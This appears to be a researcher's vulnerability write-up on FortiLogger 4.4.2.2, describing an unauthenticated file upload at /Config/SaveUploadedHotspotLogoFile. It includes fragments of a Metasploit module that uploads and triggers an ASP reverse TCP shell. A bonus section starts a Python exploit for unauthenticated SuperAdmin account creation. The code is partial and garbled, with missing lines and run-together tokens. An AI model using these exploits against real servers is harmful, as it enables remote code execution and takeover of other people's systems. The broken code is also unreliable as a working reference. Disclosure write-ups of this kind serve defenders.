FortiLogger is a web-based logging and reporting software designed specifically for FortiGate firewalls, running on Windows operating systems. It contains features such as instant status tracking, logging, search / filtering, reporting and hotspot.
Vulnerability Discovery
This vulnerability found on upload a company logo under Hotspot Settingshttp://<IP>:5000/config/hotspotsettings). An anonymous user can be send a file without any authentication or session header with POST request to /Config/SaveUploadedHotspotLogoFile.
The file uploads under C:\Program Files\RZK\Fortilogger\Web\Assets\temp\hotspot\img destination with logohotspot name without controlling file extention or content.
Using this vulnerability, a malicious file can be uploaded and accessed the remote server where the application was running.
Vulnerability Exploitation
I found and tested this vulnerability on version 4.4.2.2 for now. So, firstly check the version of application. The application has an API for getting some information about the application with POST request to /shared/GetProductInfo. I get only version number on it.
unless res return CheckCode::Unknown('Target is unreachable.') end
unless res.code == 200 return CheckCode::Unknown("Unexpected server response: #{res.code}") end
version = Gem::Version.new(JSON.parse(res.body)['Version'])
if version <= Gem::Version.new('4.4.2.2') CheckCode::Vulnerable("FortiLogger version #{version}") else CheckCode::Safe("FortiLogger version #{version}") end rescue JSON::ParserError fail_with(Failure::UnexpectedReply, 'The target may have been updated') end end
Generate ASP reverse tcp payload
1 2 3
defcreate_payload Msf::Util::EXE.to_exe_asp(generate_payload_exe).to_s end
Below part uploads payload to target system and we already know the file located on /Assets/temp/hotspot/img/logohotspot.asp and triggers it for reverse connection;
unless res fail_with(Failure::Unknown, 'No response from server') end
unless res.code == 200 fail_with(Failure::Unknown, "Unexpected server response: #{res.code}") end
json_res = begin JSON.parse(res.body) rescue JSON::ParserError nil end
if json_res.nil? || json_res['Message'] == 'Error in saving file' fail_with(Failure::UnexpectedReply, 'Error uploading payload') end
print_good('Payload has been uploaded')
handler
print_status('Executing payload...') send_request_cgi({ 'uri' => normalize_uri(target_uri.path, '/Assets/temp/hotspot/img/logohotspot.asp'), 'method' => 'GET' }, 5) end rescue StandardError => e fail_with(Failure::UnexpectedReply, "Failed to execute the payload: #{e}") end
POC
Bonus | Unauthenticated SuperAdmin User Creation
Also, This software has 2 more vulnerabilities, information disclosure and create user without any authorization or session header. Here is the exploit.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17
python3 fortilogger_vuln.py
FortiLogger | Log and Report System - v4.4.2.2 Remote SuperAdmin Account Creation Vulnerability / Information Disclosure
Berkan Er <b3rsec@protonmail.com> @erberkan
Usage: python3 fortilogger_vuln.py < IP > < PORT > < CREATE USER {TRUE / FALSE} >
IP: IP Address of FortiLogger host PORT: Port number of FortiLogger host TRUE: Create User FALSE: Show Product Infos
# Exploit Title: FortiLogger - Remote SuperAdmin Account Creation Vulnerability / Information Disclosure # Date: 30-01-2021 # Exploit Author: Berkan Er # Vendor Homepage: https://www.fortilogger.com/ # Version: 4.4.2.2 # Tested on: Windows 10 Enterprise # A remote attacker can be create an user with SuperAdmin profile
#!/usr/bin/python3
import argparse import string import sys from random import random
import requests import json
banner = ''' FortiLogger | Log and Report System - v4.4.2.2 Remote SuperAdmin Account Creation Vulnerability / Information Disclosure Berkan Er <b3rsec@protonmail.com> @erberkan '''
